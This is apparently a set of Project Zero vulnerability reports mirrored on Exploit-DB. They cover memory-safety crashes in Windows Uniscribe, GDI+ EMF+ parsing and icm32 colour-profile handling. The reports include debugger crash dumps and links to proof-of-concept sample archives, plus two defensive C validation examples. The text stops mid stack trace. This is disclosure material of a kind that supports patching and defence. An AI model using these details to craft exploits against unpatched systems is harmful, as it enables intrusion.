The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1028

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!UpdateGlyphFlags function, while trying to display text using a corrupted font file:

---
(5268.3b50): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003fe0 ebx=0000ffff ecx=000007fc edx=0050ee58 esi=0000f803 edi=0931c020
eip=75230c90 esp=0050eb48 ebp=0050eb50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!UpdateGlyphFlags+0x30:
75230c90 66834c380210    or      word ptr [eax+edi+2],10h ds:002b:09320002=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0050eb50 752336b3 42555347 0050ee58 00000000 USP10!UpdateGlyphFlags+0x30
0050ed2c 7522f29f 42555347 0050ee68 0050ee3c USP10!ApplyFeatures+0x553
0050ed78 7522b083 00000000 00000000 00000000 USP10!SubstituteOtlGlyphs+0x1bf
0050eda4 75226d5c 0050edd4 0050ee4c 0050ee68 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0050f010 7521548a 0050f11c 0050f148 0050f130 USP10!GenericEngineGetGlyphs+0xa1c
0050f0d0 7521253f 0050f11c 0050f148 0050f130 USP10!ShapingGetGlyphs+0x36a
0050f1bc 751e5c6f 7901150c 09316124 09316318 USP10!ShlShape+0x2ef
0050f200 751f167a 7901150c 09316124 09316318 USP10!ScriptShape+0x15f
0050f260 751f2b14 00000000 00000000 0050f2e0 USP10!RenderItemNoFallback+0xfa
0050f28c 751f2da2 00000000 00000000 0050f2e0 USP10!RenderItemWithFallback+0x104
0050f2b0 751f4339 00000000 0050f2e0 09316124 USP10!RenderItem+0x22
0050f2f4 751e7a04 000004a0 00000400 7901150c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0050f30c 76ca5465 7901150c 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0050f358 76ca5172 7901150c 0050f740 0000000a LPK!LpkStringAnalyse+0xe5
0050f454 76ca1410 7901150c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0050f488 763c18b0 7901150c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0050f4c8 763c22bf 7901150c 00000070 00000000 USER32!DT_DrawStr+0x13c
0050f514 763c21f2 7901150c 0050f740 0050f754 USER32!DT_GetLineBreak+0x78
0050f5c0 763c14d4 7901150c 00000000 0000000a USER32!DrawTextExWorker+0x255
0050f5e4 763c2475 7901150c 0050f740 ffffffff USER32!DrawTextExW+0x1e
0050f618 001a6a5c 7901150c 0050f740 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a eax+edi
    address 09320000 found in
    _DPH_HEAP_ROOT @ 9311000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 9311f38:          931c000             4000 -          931b000             6000
    5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5dbea792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f68fa USP10!UspAllocStatic+0x000000aa
    751f6cea USP10!UspAcquireTempAlloc+0x0000002a
    751e8778 USP10!ScriptRecordDigitSubstitution+0x00000028
    76ca5304 LPK!ReadNLSScriptSettings+0x00000074
    76ca53b8 LPK!LpkStringAnalyse+0x00000038
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1029

We have encountered a number of crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file. While crashes in this specific family take various shapes and forms, they all occur in functions directly or indirectly called by USP10!BuildFSM. An example crash excerpt is shown below:

---
(5020.4074): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000cc ebx=0964b270 ecx=0964c6aa edx=0038f409 esi=00000782 edi=0963d7d0
eip=751f968d esp=0038f3bc ebp=0038f468 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
USP10!BuildDynamicStatesStaticInputs+0x45d:
751f968d 668944b302      mov     word ptr [ebx+esi*4+2],ax ds:002b:0964d07a=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0038f468 751f7a33 00000048 09649700 0000001a USP10!BuildDynamicStatesStaticInputs+0x45d
0038f6a0 751f7076 095d3d88 095e1fa8 0038f6cc USP10!BuildFSM+0x193
0038f6b0 751fc5f4 c10125b4 095d3d88 095c6124 USP10!LoadArabicShapeTables+0x106
0038f6cc 751ea5a0 c10125b4 0963d7d0 0000001a USP10!ArabicLoadTbl+0xd4
0038f6f0 751ea692 095c6124 c10125b4 0000001a USP10!UpdateCache+0xb0
0038f704 751f152d c10125b4 095c6000 751f15db USP10!ScriptCheckCache+0x62
0038f710 751f15db 00000001 00000001 095c62e8 USP10!GetShapeFunction+0xd
0038f748 751f2b14 00000001 00000000 0038f7c8 USP10!RenderItemNoFallback+0x5b
0038f774 751f2da2 00000001 00000000 0038f7c8 USP10!RenderItemWithFallback+0x104
0038f798 751f4339 00000000 0038f7c8 095c6124 USP10!RenderItem+0x22
0038f7dc 751e7a04 000004a0 00000400 c10125b4 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0038f7f4 76ca5465 c10125b4 095c6040 0000000a USP10!ScriptStringAnalyse+0x284
0038f840 76ca5172 c10125b4 0038fc28 0000000a LPK!LpkStringAnalyse+0xe5
0038f93c 76ca1410 c10125b4 00000000 00000000 LPK!LpkCharsetDraw+0x332
0038f970 763c18b0 c10125b4 00000000 00000000 LPK!LpkDrawTextEx+0x40
0038f9b0 763c22bf c10125b4 00000040 00000000 USER32!DT_DrawStr+0x13c
0038f9fc 763c21f2 c10125b4 0038fc28 0038fc3c USER32!DT_GetLineBreak+0x78
0038faa8 763c14d4 c10125b4 00000000 0000000a USER32!DrawTextExWorker+0x255
0038facc 763c2475 c10125b4 0038fc28 ffffffff USER32!DrawTextExW+0x1e
0038fb00 01196a5c c10125b4 0038fc28 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a ebx
    address 0964b270 found in
    _DPH_HEAP_ROOT @ 95c1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 95c2ed4:          964b270             1d8c -          964b000             3000
    5dbb8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f6644 USP10!UspAllocCache+0x00000054
    751f7975 USP10!BuildFSM+0x000000d5
    751f7076 USP10!LoadArabicShapeTables+0x00000106
    751fc5f4 USP10!ArabicLoadTbl+0x000000d4
    751ea5a0 USP10!UpdateCache+0x000000b0
    751ea692 USP10!ScriptCheckCache+0x00000062
    751f152d USP10!GetShapeFunction+0x0000000d
    751f2b14 USP10!RenderItemWithFallback+0x00000104
    751f2da2 USP10!RenderItem+0x00000022
    751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
    751e7a04 USP10!ScriptStringAnalyse+0x00000284
    76ca5465 LPK!LpkStringAnalyse+0x000000e5
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 2 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1030

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!FillAlternatesList function, while trying to request a list of alternate glyphs for a specific glyph in a corrupted font file:

---
(4bfc.c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000d ebx=0021006f ecx=00000010 edx=00000018 esi=07b4bfe8 edi=0021f620
eip=75232fe1 esp=0021f550 ebp=0021f5b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!FillAlternatesList+0x2d1:
75232fe1 66891c32        mov     word ptr [edx+esi],bx    ds:002b:07b4c000=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0021f5b8 7522eb56 09312db6 00000000 00000003 USP10!FillAlternatesList+0x2d1
0021f5ec 75208b38 0021f640 0021f614 746c6161 USP10!GetOtlGlyphAlternates+0x86
0021f770 7520f214 0021f9d8 6e74616c 746c6664 USP10!OtlGetAlternateGlyphList+0x108
0021f7a0 00dc4557 30011a14 00000001 00000000 USP10!ScriptGetFontAlternateGlyphs+0xb4
[...]
---

In our test harness, we set the cMaxAlternates parameter of the ScriptGetFontAlternateGlyphs function to 10, indicating that this is the maximum number of values which can be written to the output pAlternateGlyphs array. However, the API function does not seem to respect the argument and attempts to write more data into the buffer -- in this case, 29 WORDs. The vulnerability can also be confirmed by looking at the output value of pcAlternates, which should never exceed 10 in this case, but is indeed set to 29. As a result, the bug may lead to corruption of various memory areas, including stack, heap, and static memory, depending on the type of pointer passed to the function by its caller.
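The contract described above (the callee may write at most cMaxAlternates entries and must report a count no larger than that) can be checked from the outside in exactly the way the report suggests: compare the returned count with the cap, and surround the output buffer with a guard region that must survive the call. The following is an added example written for this page, not Project Zero's harness and not Uniscribe code. The two fill routines are stand-ins that model the behaviour the report describes (one ignores the cap, one clamps to it); the names `fill_alternates_ignoring_cap`, `fill_alternates_clamped`, `check_alternates_contract` and `run_model`, the 29-entry constructed font and the sentinel value are all assumptions made here.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not Project Zero's harness and not Uniscribe code): a model of
 * the cMaxAlternates contract from the report, with the two checks a test
 * harness can apply from the outside: the returned count must not exceed the
 * cap, and a guard region after the output buffer must stay untouched. */

typedef uint16_t WORD;

#define GUARD_WORD 0xA5A5u   /* constructed sentinel for the guard region */

/* Model of the behaviour the report describes: the callee takes its count from
 * the font (alt_count_in_font) and never looks at the caller's cap. This is a
 * stand-in written for this example, not the real USP10!FillAlternatesList.
 * The caller must supply a buffer that really holds alt_count_in_font entries
 * so the model itself stays well-defined C. */
static int fill_alternates_ignoring_cap(const WORD *font_alts, int alt_count_in_font,
                                        int cMaxAlternates, WORD *pAlternateGlyphs,
                                        int *pcAlternates)
{
    (void)cMaxAlternates;                 /* the flaw: the cap is never consulted */
    for (int i = 0; i < alt_count_in_font; i++)
        pAlternateGlyphs[i] = font_alts[i];
    *pcAlternates = alt_count_in_font;    /* so pcAlternates can exceed the cap */
    return 0;
}

/* Hardened model: never write past cMaxAlternates and never report more than
 * were written; the return value tells the caller whether the list was cut. */
static int fill_alternates_clamped(const WORD *font_alts, int alt_count_in_font,
                                   int cMaxAlternates, WORD *pAlternateGlyphs,
                                   int *pcAlternates)
{
    if (cMaxAlternates < 0 || (cMaxAlternates > 0 && pAlternateGlyphs == NULL))
        return -1;                        /* invalid arguments */
    int n = alt_count_in_font < cMaxAlternates ? alt_count_in_font : cMaxAlternates;
    for (int i = 0; i < n; i++)
        pAlternateGlyphs[i] = font_alts[i];
    *pcAlternates = n;
    return alt_count_in_font > cMaxAlternates ? 1 : 0;  /* 1 = list truncated */
}

/* Harness-side check from the report. Returns a bitmask:
 *   1 = reported count exceeds the cap
 *   2 = guard words after the caller's buffer were overwritten
 *   0 = contract honoured */
static int check_alternates_contract(int cMaxAlternates, int cAlternates,
                                     const WORD *buf, int guard_words)
{
    int result = 0;
    if (cAlternates > cMaxAlternates)
        result |= 1;
    for (int i = 0; i < guard_words; i++)
        if (buf[cMaxAlternates + i] != GUARD_WORD)
            result |= 2;
    return result;
}

typedef int (*fill_fn)(const WORD *, int, int, WORD *, int *);

/* Runs one model routine against a constructed font with 29 alternates and a
 * caller cap of 10 (the numbers from the report) into a guarded buffer, and
 * returns the check_alternates_contract() bitmask. */
static int run_model(fill_fn fn)
{
    enum { CAP = 10, FONT_ALTS = 29, GUARD = 32 };
    WORD font_alts[FONT_ALTS];
    for (int i = 0; i < FONT_ALTS; i++)
        font_alts[i] = (WORD)(0x0100 + i);  /* constructed glyph ids */

    WORD buf[CAP + GUARD];                  /* cap-sized buffer plus guard words */
    for (int i = 0; i < CAP + GUARD; i++)
        buf[i] = GUARD_WORD;

    int count = 0;
    fn(font_alts, FONT_ALTS, CAP, buf, &count);
    return check_alternates_contract(CAP, count, buf, GUARD);
}

int main(void)
{
    printf("cap ignored : violations=%d\n", run_model(fill_alternates_ignoring_cap)); /* 3 */
    printf("cap honoured: violations=%d\n", run_model(fill_alternates_clamped));      /* 0 */
    return 0;
}
```

The guard region plays the role PageHeap plays in the report: with the buffer allocated at the end of a page, the same overrun faults instead of silently clobbering neighbouring data, which is why the advisory recommends PageHeap and a heap-allocated output buffer for a reliable repro.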

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled and the output buffer allocated from the heap. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the vulnerable API function.

Attached is a proof of concept malformed font file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1031

Through fuzzing, we have discovered a number of different crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file or calling documented Uniscribe API functions against such malformed fonts. In this bug, we address a variety of crashes manifested through invalid memory READ accesses. Some of them occur at page boundaries, while others occur at seemingly valid yet non-mapped addresses. The sheer number of crashes makes it very difficult for us to assess the root cause, severity and impact of each of them within a reasonable time-frame. Consequently, we have only performed basic deduplication based on the top-level address of the faulting instruction, and are reporting all such crashes in this single bug tracker entry.

A summary of the crash locations is as follows:

--------------------------------------------------------------
1	USP10!otlMultiSubstLookup::apply+0xa8
2	USP10!otlSingleSubstLookup::applyToSingleGlyph+0x98
3	USP10!otlSingleSubstLookup::apply+0xa9
4	USP10!otlMultiSubstLookup::getCoverageTable+0x2c
5	USP10!otlMark2Array::mark2Anchor+0x18
6	USP10!GetSubstGlyph+0x2e
7	USP10!BuildTableCache+0x1ca
8	USP10!otlMkMkPosLookup::apply+0x1b4
9	USP10!otlLookupTable::markFilteringSet+0x1a
10	USP10!otlSinglePosLookup::getCoverageTable+0x12
11	USP10!BuildTableCache+0x1e7
12	USP10!otlChainingLookup::getCoverageTable+0x15
13	USP10!otlReverseChainingLookup::getCoverageTable+0x15
14	USP10!otlLigCaretListTable::coverage+0x7
15	USP10!otlMultiSubstLookup::apply+0x99
16	USP10!otlTableCacheData::FindLookupList+0x9
17	USP10!ttoGetTableData+0x4b4
18	USP10!GetSubtableCoverage+0x1ab
19	USP10!otlChainingLookup::apply+0x2d
20	USP10!MergeLigRecords+0x132
21	USP10!otlLookupTable::subTable+0x23
22	USP10!GetMaxParameter+0x53
23	USP10!ApplyLookup+0xc3
24	USP10!ApplyLookupToSingleGlyph+0x6f
25	USP10!ttoGetTableData+0x19f6
26	USP10!otlExtensionLookup::extensionSubTable+0x1d
27	USP10!ttoGetTableData+0x1a77
--------------------------------------------------------------

All of the issues reproduce successfully on Windows 7. It is highly encouraged to enable PageHeap for the test program in order to get reliable repros. It is also necessary to use a custom program which displays all of the font's glyphs at various point sizes, and additionally calls some of the Uniscribe-specific API functions.

Attached is an archive with textual crash excerpts and up to 3 samples per each unique crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042

We have encountered a crash in the Windows GDI+ library, in the gdiplus!GetRECTSForPlayback function, while trying to display a malformed EMF+ image file:

---
(6be8.6f1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=ffffadd6 ecx=000c1000 edx=00000000 esi=0000348f edi=00000000
eip=6c83a189 esp=0023f21c ebp=0023f238 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
gdiplus!GetRECTSForPlayback+0xe2:
6c83a189 8a11            mov     dl,byte ptr [ecx]          ds:002b:000c1000=??
0:000> kb
ChildEBP RetAddr  Args to Child              
0023f238 6c83c8a3 000001e0 00000018 00000800 gdiplus!GetRECTSForPlayback+0xe2
0023f294 6c8387e3 07b6bcb0 0000403a 00008800 gdiplus!SetTSClipEPR::Play+0x71
0023f2b4 6c83a88d 0000403a 00008800 00000018 gdiplus!GdipPlayMetafileRecordCallback+0x35
0023f2e4 6c83e32c 00000278 000c013c 000c0000 gdiplus!MetafilePlayer::EnumerateEmfPlusRecords+0x73
0023f2fc 76cd58a4 070125f7 04e18ff8 000c0098 gdiplus!EnumEmfWithDownLevel+0x61
0023f388 6c83abb4 070125f7 403581b3 6c83e2cb GDI32!bInternalPlayEMF+0x6a3
0023f3c0 6c83e5b1 070125f7 08462d83 0023f440 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
0023f460 6c83f592 42776037 08462d83 0023f598 gdiplus!GpGraphics::EnumEmfPlusDual+0x1e7
0023f5b0 6c8448c9 00000000 42cc0000 42d80000 gdiplus!GpMetafile::EnumerateForPlayback+0x778
0023f6ac 6c84494d 07b65f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
0023f710 6c80e03f 07b65f28 0023f738 0023f748 gdiplus!GpGraphics::DrawImage+0x51
0023f778 6c80e0d3 07b61d28 4269b097 00000000 gdiplus!GdipDrawImage+0x130
0023f7a4 000e1747 07b61d28 07b65f28 00000000 gdiplus!GdipDrawImageI+0x49
[...]
---

The crash appears to be caused by insufficient validation of the record size in relation to the number of declared rectangles, in the handler of the EmfPlusSetTSClip EMF+ record. It is unclear if the bug can also lead to memory corruption (likely not), but it could still potentially lead to the disclosure of junk/out-of-bounds heap bytes.
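The validation the paragraph above finds missing is a single comparison: the number of rectangles the record declares, multiplied by the size of one rectangle, must not exceed the bytes the record actually carries. The following is an added example written for this page, not GDI+ code, showing a defensive parser for this record. The layout is assumed from the MS-EMFPLUS description of EmfPlusSetTSClip as recalled here: a 12-byte EmfPlusRecordHeader (Type, Flags, Size, DataSize), a Flags word whose low 15 bits hold NumRects and whose top bit marks compressed 4-byte rectangles (8 bytes each otherwise); check that against the specification before relying on it. The record type 0x403A does appear in the stack trace above; the second constructed sample below reuses the three arguments shown for GdipPlayMetafileRecordCallback (0000403a 00008800 00000018) on the assumption that they are the record's Type, Flags and Size, which would declare 2048 compressed rectangles (8192 bytes) inside a 24-byte record. The names `parse_settsclip`, `check_record` and the status codes are made up for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example, not GDI+ code: a defensive parser for the EmfPlusSetTSClip
 * record that checks the declared rectangle count against the bytes present
 * before touching any rectangle. Layout assumed from MS-EMFPLUS (verify):
 * 12-byte header (Type, Flags, Size, DataSize), then NumRects rectangles of
 * 4 bytes (Flags bit 15 set, compressed) or 8 bytes each. */

#define EMFPLUS_HEADER_SIZE   12u
#define EMFPLUS_SETTSCLIP     0x403Au   /* record type; also visible in the crash args above */

enum tsclip_status {
    TSCLIP_OK = 0,
    TSCLIP_TRUNCATED_HEADER,   /* fewer than 12 bytes available */
    TSCLIP_WRONG_TYPE,
    TSCLIP_SIZE_MISMATCH,      /* Size != DataSize + 12, or record exceeds the input */
    TSCLIP_RECTS_EXCEED_DATA   /* NumRects * rect_size > DataSize: the reported flaw */
};

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validates one SetTSClip record held in buf[0..len). On success stores the
 * rectangle count and per-rectangle size so the caller can iterate safely. */
static enum tsclip_status parse_settsclip(const uint8_t *buf, size_t len,
                                          uint32_t *num_rects, uint32_t *rect_size)
{
    if (len < EMFPLUS_HEADER_SIZE)
        return TSCLIP_TRUNCATED_HEADER;
    uint16_t type  = rd16(buf);
    uint16_t flags = rd16(buf + 2);
    uint32_t size  = rd32(buf + 4);
    uint32_t data  = rd32(buf + 8);
    if (type != EMFPLUS_SETTSCLIP)
        return TSCLIP_WRONG_TYPE;
    /* Size counts the header, DataSize only the payload; check them against
     * each other (overflow-safe) and against what the caller actually holds. */
    if (data > UINT32_MAX - EMFPLUS_HEADER_SIZE ||
        size != data + EMFPLUS_HEADER_SIZE || size > len)
        return TSCLIP_SIZE_MISMATCH;
    uint32_t n  = flags & 0x7FFFu;               /* NumRects: low 15 bits */
    uint32_t rs = (flags & 0x8000u) ? 4u : 8u;   /* C flag: compressed rectangles */
    /* n <= 0x7FFF and rs <= 8, so n * rs cannot overflow 32 bits. This is the
     * comparison the report describes as missing. */
    if (n * rs > data)
        return TSCLIP_RECTS_EXCEED_DATA;
    *num_rects = n;
    *rect_size = rs;
    return TSCLIP_OK;
}

/* Constructed sample records (not taken from the attached files). */
static const uint8_t good_record[] = {
    0x3A, 0x40,             /* Type = EmfPlusSetTSClip */
    0x02, 0x80,             /* Flags = 0x8002: C=1 (4-byte rects), NumRects=2 */
    0x14, 0x00, 0x00, 0x00, /* Size = 20 */
    0x08, 0x00, 0x00, 0x00, /* DataSize = 8 */
    0x00, 0x00, 0x10, 0x10, /* rect 0 */
    0x20, 0x20, 0x30, 0x30  /* rect 1 */
};

/* Mirrors the Type/Flags/Size arguments visible in the stack trace above:
 * Flags 0x8800 declares 2048 compressed rectangles (8192 bytes) while the
 * record carries only 12 payload bytes. */
static const uint8_t bad_record[] = {
    0x3A, 0x40,             /* Type = EmfPlusSetTSClip */
    0x00, 0x88,             /* Flags = 0x8800: C=1, NumRects=0x0800 */
    0x18, 0x00, 0x00, 0x00, /* Size = 24 */
    0x0C, 0x00, 0x00, 0x00, /* DataSize = 12 */
    0x00, 0x00, 0x10, 0x10,
    0x20, 0x20, 0x30, 0x30,
    0x40, 0x40, 0x50, 0x50
};

/* Convenience wrapper returning only the status code. */
static int check_record(const uint8_t *rec, size_t len)
{
    uint32_t n = 0, rs = 0;
    return (int)parse_settsclip(rec, len, &n, &rs);
}

int main(void)
{
    printf("good record: status %d\n", check_record(good_record, sizeof good_record)); /* 0 */
    printf("bad record : status %d\n", check_record(bad_record, sizeof bad_record));   /* 4 */
    return 0;
}
```

A handler that performs this check can reject the record before reading a single rectangle; without it, the loop over NumRects walks past the end of the record's heap allocation, which is the page-boundary read shown in the crash above.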

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is an archive with two samples, which trigger crashes at two different offsets within the gdiplus!GetRECTSForPlayback function.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41656.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1052

We have encountered a crash in the Windows Color Management library (icm32.dll), in the icm32!Fill_ushort_ELUTs_from_lut16Tag function, while trying to display a TIFF image with a malformed embedded color profile:

---
(7c1c.93b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0028f0dc ecx=0984f7c0 edx=00006ff0 esi=0980f800 edi=00000100
eip=6ac4f701 esp=0028ecc8 ebp=0028ecf4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4:
6ac4f701 0fb711          movzx   edx,word ptr [ecx]       ds:002b:0984f7c0=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0028ecf4 6ac495bd 0028f0dc ff837f84 00004000 icm32!Fill_ushort_ELUTs_from_lut16Tag+0xe4
0028ed28 6ac4b117 0028f0dc 0028ef54 00002100 icm32!ExtractElutFromLut16+0xec
0028ed80 6ac4ca1d 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_LutsFromLut16+0x10a
0028edac 6ac4ccbf 0028f0dc 0028ef54 41324230 icm32!ExtractAll_MFT_Luts+0x8c
0028ee3c 6ac4d562 0028f0dc 0028ef54 00000000 icm32!ExtractAllLuts+0x257
0028f148 6ac4e947 0953ee58 09534ff0 061f7f70 icm32!CreateCombi+0x725
0028f2ec 6ac43c84 0953ee58 09534ff0 00000000 icm32!PrepareCombiLUTs+0x3a6
0028f498 6ac42dba 0953ee58 09534ff0 09534ff0 icm32!CMMConcatInitPrivate+0x23e
0028f4b4 6ac41630 0028f520 09534ff0 0028f5c4 icm32!CWConcatColorWorld4MS+0x42
0028f4e0 6ac41fce 0028f520 00180002 00000000 icm32!CMCreateMultiProfileTransformInternal+0x10b
0028f508 6c5ec8af 0028f5bc 00000002 0028f5c4 icm32!CMCreateMultiProfileTransform+0x20
0028f57c 6d2fd7c8 0028f5bc 00000002 0028f5c4 mscms!CreateMultiProfileTransform+0x22d
0028f5a0 6d2fb62c 0028f5bc 0028f5c4 00000000 WindowsCodecsExt!ICMModule::CreateMultiProfileTransform+0x27
0028f5d4 6d2f58cd 06277f90 40c8e2f0 40cf42f0 WindowsCodecsExt!CIcmColorTransform::CreateVectorTransform+0x6f
0028f640 69b25e74 09744f88 0970afac 0028f6b4 WindowsCodecsExt!CFormatConverterNChannel::Initialize+0x4b2
0028f6d8 6c8ea4be 0970cf90 0970afac 0028f710 WindowsCodecs!CFormatConverterResolver::Initialize+0x318
0028f724 6c8ec909 0010300c 00000000 07b67f68 gdiplus!GpWicDecoder::InitFormatConverter+0x7e
0028f760 6c8e9d72 00000000 07b55fd0 07b4df98 gdiplus!GpWicDecoder::DecodeFrame+0xb5
0028f774 6c8ddeb8 07b67f68 07b4df98 07b4df98 gdiplus!GpWicDecoder::GetImageInfo+0x29
0028f798 6c8de328 07b4df98 0000027f 07b4df38 gdiplus!GpDecodedImage::InternalGetImageInfo+0x3f
0028f7b8 6c830aee 07b55fd0 07b4df98 07b4bcd8 gdiplus!GpDecodedImage::GetImageInfo+0x18
0028f7cc 6c832cd3 0028f880 0028f7e8 6c83330d gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x48
0028f7d8 6c83330d 0028f880 07b45f28 0028f7f8 gdiplus!CopyOnWriteBitmap::Create+0x1d
0028f7e8 6c8342aa 0028f880 07b43ff4 0028f81c gdiplus!GpBitmap::GpBitmap+0x2c
0028f7f8 6c803e8d 0028f880 085a1000 07b43ff0 gdiplus!GpImage::LoadImageW+0x69
0028f81c 003b171f 0028f880 07b43ff4 b2121dcf gdiplus!GdipLoadImageFromFile+0x74
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays images using GDI+, or any existing GDI+ client (such as Microsoft Office).

Attached is a TIFF file which triggers the crash.

################################################################################

A similar crash with a slightly different stack trace was also encountered in the icm32!Fill_byte_ALUTs_from_lut16Tag function:

---
(62a8.4d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000001fe ebx=09222000 ecx=09220ffe edx=00000801 esi=000003fc edi=0924d3f8
eip=6ac4f821 esp=002bf594 ebp=002bf5b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a:
6ac4f821 0fb711          movzx   edx,word ptr [ecx]       ds:002b:09220ffe=????
0:000> kb
ChildEBP RetAddr  Args to Child              
002bf5b8 6ac4aa4d 002bf9a0 00000801 0924d3f8 icm32!Fill_byte_ALUTs_from_lut16Tag+0x9a
002bf5ec 6ac4b0f3 0002a000 002bf818 00007000 icm32!ExtractAlutFromLut16+0xe2
